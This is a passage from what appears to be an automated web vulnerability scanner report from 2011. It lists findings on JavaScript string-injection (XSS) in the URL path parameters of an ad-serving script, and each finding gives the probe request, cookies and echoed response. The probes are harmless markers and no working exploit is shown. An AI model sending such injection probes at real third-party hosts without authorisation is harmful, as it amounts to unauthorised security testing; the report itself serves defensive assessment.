Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1729
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687990c00dc';c26396354fa';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.216. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eb6c'%3b5079f91ec4f was submitted in the REST URL parameter 8. This input was echoed as 6eb6c';5079f91ec4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/2036879906eb6c'%3b5079f91ec4f//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,2036879906eb6c';5079f91ec4f;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.217. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76eb8'%3b154269bab02 was submitted in the REST URL parameter 9. This input was echoed as 76eb8';154269bab02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//076eb8'%3b154269bab02/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=076eb8';154269bab02;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.218. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e74'%3b34f7324748b was submitted in the REST URL parameter 10. This input was echoed as 44e74';34f7324748b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/20344e74'%3b34f7324748b/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20344e74';34f7324748b%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.219. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a862'%3bf3353a7f709 was submitted in the REST URL parameter 11. This input was echoed as 3a862';f3353a7f709 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/95423a862'%3bf3353a7f709//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=95423a862';f3353a7f709%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.220. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb8a'%3b33ba26914f6 was submitted in the REST URL parameter 4. This input was echoed as 3cb8a';33ba26914f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/23053cb8a'%3b33ba26914f6/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:48:54 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=23053cb8a';33ba26914f6%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.221. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13ac3'%3be8a5b3462de was submitted in the REST URL parameter 5. This input was echoed as 13ac3';e8a5b3462de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/013ac3'%3be8a5b3462de/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:35 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=013ac3';e8a5b3462de,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.222. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53bb2'%3b1831e25c1a7 was submitted in the REST URL parameter 6. This input was echoed as 53bb2';1831e25c1a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/053bb2'%3b1831e25c1a7/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591979
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,053bb2';1831e25c1a7%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.223. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553df'%3b09d71b838b7 was submitted in the REST URL parameter 7. This input was echoed as 553df';09d71b838b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985553df'%3b09d71b838b7/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1585
Cache-Control: max-age=2591987
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985553df';09d71b838b7';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.224. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f3d6'%3bcc30eb8bed2 was submitted in the REST URL parameter 8. This input was echoed as 9f3d6';cc30eb8bed2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/2036879859f3d6'%3bcc30eb8bed2//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591986
Expires: Mon, 28 Mar 2011 01:49:30 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,2036879859f3d6';cc30eb8bed2%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.225. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e1'%3ba8fb555b141 was submitted in the REST URL parameter 9. This input was echoed as d59e1';a8fb555b141 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0d59e1'%3ba8fb555b141/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
